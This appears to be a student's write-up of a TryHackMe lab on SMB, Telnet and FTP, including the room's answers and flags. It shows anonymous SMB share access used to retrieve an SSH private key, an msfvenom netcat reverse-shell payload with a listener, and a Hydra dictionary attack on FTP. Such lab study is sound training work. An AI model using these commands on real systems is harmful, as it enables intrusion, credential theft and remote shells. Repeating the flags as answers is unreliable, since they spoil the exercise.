THM Network Services

Network Services 1 Notes

What is SMB?

SMB — Server Message Block Protocol — is a client-server communication protocol used for sharing access to files, printers, serial ports and other resources on a network.

The SMB protocol is known as a response-request protocol, meaning that it transmits multiple messages between the client and server to establish a connection. Clients connect to servers using TCP/IP (actually NetBIOS over TCP/IP as specified in RFC1001 and RFC1002), NetBEUI or IPX/SPX.

How does SMB work?

Once they have established a connection, clients can then send commands (SMBs) to the server that allow them to access shares, open files, read and write files, and generally do all the sort of things that you want to do with a file system. However, in the case of SMB, these things are done over the network.

What does SMB stand for?

Server Message Block

What type of protocol is SMB?

response-request

What do clients connect to servers using?

TCP/IP

What systems does Samba run on?

Unix

Enumerating SMB

Enumeration is the process of gathering information on a target in order to find potential attack vectors and aid in exploitation.

Enumeration can be used to gather usernames, passwords, network information, hostnames, application data, services, or any other information that may be valuable to an attacker.

Typically, there are SMB share drives on a server that can be connected to and used to view or transfer files. SMB can often be a great starting point for an attacker looking to discover sensitive information.

The first step of enumeration is to conduct a port scan, to find out as much information as you can about the services, applications, structure and operating system of the target machine.

Enum4Linux

Enum4linux is a tool used to enumerate SMB shares on both Windows and Linux systems. It is basically a wrapper around the tools in the Samba package and makes it easy to quickly extract information from the target pertaining to SMB.

The syntax of Enum4Linux is nice and simple: “enum4linux [options] ip”

TAG FUNCTION

-U get userlist
-M get machine list
-N get namelist dump (different from -U and-M)
-S get sharelist
-P get password policy information
-G get group and member list

-a all of the above (full basic enumeration)

Conduct an nmap scan of your choosing, How many ports are open?

3

What ports is SMB running on?

139/445

Let’s get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name?

WORKGROUP

What comes up as the name of the machine?

POLOSMB

What operating system version is running?

6.1

What share sticks out as something we might want to investigate?

profiles

Exploiting SMB

While there are vulnerabilities such as CVE-2017–7494 that can allow remote code execution by exploiting SMB, you’re more likely to encounter a situation where the best way into a system is due to misconfigurations in the system.

In this case, we’re going to be exploiting anonymous SMB share access- a common misconfiguration that can allow us to gain information that will lead to a shell.

Method Breakdown

So, from our enumeration stage, we know:

- The SMB share location

- The name of an interesting SMB share

SMBClient

Because we’re trying to access an SMB share, we need a client to access resources on servers. We will be using SMBClient because it’s part of the default samba suite.

We can remotely access the SMB share using the syntax:

smbclient //[IP]/[SHARE]

Followed by the tags:

-U [name] : to specify the user

-p [port] : to specify the port

What would be the correct syntax to access an SMB share called “secret” as user “suit” on a machine with the IP 10.10.10.2 on the default port?

smbclient //10.10.10.2/secret -U suit -p 445

Lets see if our interesting share has been configured to allow anonymous access, I.E it doesn’t require authentication to view the files. We can do this easily by:

- using the username “Anonymous”

- connecting to the share we found during the enumeration stage

- and not supplying a password.

Does the share allow anonymous access? Y/N?

y

Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?

John Cactus

What service has been configured to allow him to work from home?

SSH

Okay! Now we know this, what directory on the share should we look in?

.ssh

This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?

id_rsa

What is the smb.txt flag?

THM{smb_is_fun_eh?}

What is Telnet?

Telnet is an application protocol which allows you, with the use of a telnet client, to connect to and execute commands on a remote machine that’s hosting a telnet server.

The telnet client will establish a connection with the server. The client will then become a virtual terminal- allowing you to interact with the remote host.

Telnet sends all messages in clear text and has no specific security mechanisms. Thus, in many applications and services, Telnet has been replaced by SSH in most implementations.

How does Telnet work?

The user connects to the server by using the Telnet protocol, which means entering “telnet” into a command prompt. The user then executes commands on the server by using specific Telnet commands in the Telnet prompt. You can connect to a telnet server with the following syntax: “telnet [ip] [port]”

What is Telnet?

application protocol

What has slowly replaced Telnet?

ssh

How would you connect to a Telnet server with the IP 10.10.10.3 on port 23?

telnet 10.10.10.3 p 23

The lack of what, means that all Telnet communication is in plaintext?

encryption

Enumerating Telnet

Vulnerabilities that could be potentially trivial to exploit don’t always jump out at us. For that reason, especially when it comes to enumerating network services, we need to be thorough in our method.

How many ports are open on the target machine?

1

What port is this?

8012

This port is unassigned, but still lists the protocol it’s using, what protocol is this?

tcp

Now re-run the nmap scan, without the -p- tag, how many ports show up as open?

0

Based on the title returned to us, what do we think this port could be used for?

a backdoor

Who could it belong to? Gathering possible usernames is an important step in enumeration.

skidy

Exploiting Telnet

Telnet, being a protocol, is in and of itself insecure for the reasons we talked about earlier. It lacks encryption, so sends all communication over plaintext, and for the most part has poor access control. There are CVE’s for Telnet client and server systems, however, so when exploiting you can check for those on:

• https://www.cvedetails.com/
• https://cve.mitre.org/

ou can connect to a telnet server with the following syntax:

“telnet [ip] [port]”

A “shell” can simply be described as a piece of code or program which can be used to gain code or command execution on a device.

A reverse shell is a type of shell in which the target machine communicates back to the attacking machine.

The attacking machine has a listening port, on which it receives the connection, resulting in code or command execution being achieved.

Great! It’s an open telnet connection! What welcome message do we receive?

SKIDY’S BACKDOOR

Let’s try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)

N

Now, use the command “ping [local THM ip] -c 1” through the telnet session to see if we’re able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)

y

We’re going to generate a reverse shell payload using msfvenom.This will generate and encode a netcat reverse shell for us. Here’s our syntax:

“msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R”

-p = payload

lhost = our local host IP address (this is your machine’s IP address)

lport = the port to listen on (this is the port on your machine)

R = export the payload in raw format

What word does the generated payload start with?

mkfifo

Perfect. We’re nearly there. Now all we need to do is start a netcat listener on our local machine. We do this using:

“nc -lvp [listening port]”

What would the command look like for the listening port we selected in our payload?

nc -lvp 4444

Success! What is the contents of flag.txt?

THM{y0u_g0t_th3_t3ln3t_fl4g}

Understanding FTP

File Transfer Protocol (FTP) is a protocol used to allow remote transfer of files over a network. It uses a client-server model to do this relays commands and data in a very efficient way.

How does FTP work?

A typical FTP session operates using two channels:

• a command (sometimes called the control) channel
• a data channel.

Command channel is used for transmitting commands as well as replies to those commands, while the data channel is used for transferring data.

FTP operates using a client-server protocol. The client initiates a connection with the server, the server validates whatever login credentials are provided and then opens the session.

While the session is open, the client may execute FTP commands on the server.

Active vs Passive

The FTP server may support either Active or Passive connections, or both.

• In an Active FTP connection, the client opens a port and listens. The server is required to actively connect to it.
• In a Passive FTP connection, the server opens a port and listens (passively) and the client connects to it.

This separation of command information and data into separate channels is a way of being able to send commands to the server without having to wait for the current data transfer to finish. If both channels were interlinked, you could only enter commands in between data transfers, which wouldn’t be efficient for either large file transfers, or slow internet connections.

What communications model does FTP use?

client-server

What’s the standard FTP port?

21

How many modes of FTP connection are there?

2

Enumerating FTP

How many ports are open on the target machine?

2

What port is ftp running on?

21

What variant of FTP is running on it?

vsftpd

What is the name of the file in the anonymous FTP directory?

PUBLIC_NOTICE.txt

What do we think a possible username could be?

mike

Exploiting FTP

Similarly to Telnet, when using FTP both the command and data channels are unencrypted. Any data sent over these channels can be intercepted and read.

With data from FTP being sent in plaintext, if a man-in-the-middle attack took place an attacker could reveal anything sent through this protocol (such as passwords).

When looking at an FTP server from the position we find ourselves in for this machine, an avenue we can exploit is weak or default password configurations.

Hydra is a very fast online password cracking tool, which can perform rapid dictionary attacks against more than 50 Protocols, including Telnet, RDP, SSH, FTP, HTTP, HTTPS, SMB, several databases and much more.

The syntax for the command we’re going to use to find the passwords is this:

“hydra -t 4 -l dale -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp”

Let’s break it down:

SECTION FUNCTION

hydra Runs the hydra tool

-t 4 Number of parallel connections per target

-l [user] Points to the user who’s account you’re trying to compromise

-P [path to dictionary] Points to the file containing the list of possible passwords

-vV Sets verbose mode to very verbose, shows the login+pass combination for each attempt

[machine IP] The IP address of the target machine

ftp / protocol Sets the protocol

What is the password for the user “mike”?

password

What is ftp.txt?

THM{y0u_g0t_th3_ftp_fl4g}